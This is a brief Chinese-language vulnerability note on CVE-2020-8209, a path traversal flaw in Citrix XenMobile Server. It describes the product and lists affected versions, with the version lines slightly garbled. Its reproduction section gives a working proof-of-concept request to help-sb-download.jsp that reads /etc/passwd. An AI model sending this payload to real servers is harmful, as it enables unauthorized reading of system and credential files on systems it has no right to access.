1 Xenmobile 介绍
XenMobile 提供了一种可靠的移动设备管理解决方案,可以对企业设备和员工个人设备进行基于角色的管理、配置和支持并确保安全性。与只能提供基本设备管理软件的大多数厂商不同,XenMobile 可提供多种高级功能和特性来确保移动应用可随时用于业务目的并确保移动内容安全性,如区域防护(geo-fencing)、自动化合规性及一键式实时聊天和支持等。
2 漏洞介绍与影响范围
CVE-2020-8209 利用此漏洞,可以读取 Web 服务器根目录之外的任意文件
RP2 之前的 XenMobile 服务器 10.12
RP4 之前的 XenMobile 服务器 10.11
RP6 之前的 XenMobile 服务器 10.1010.9
RP5 之前的 XenMobile 服务器
3 漏洞复现
POC: 域名 / jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
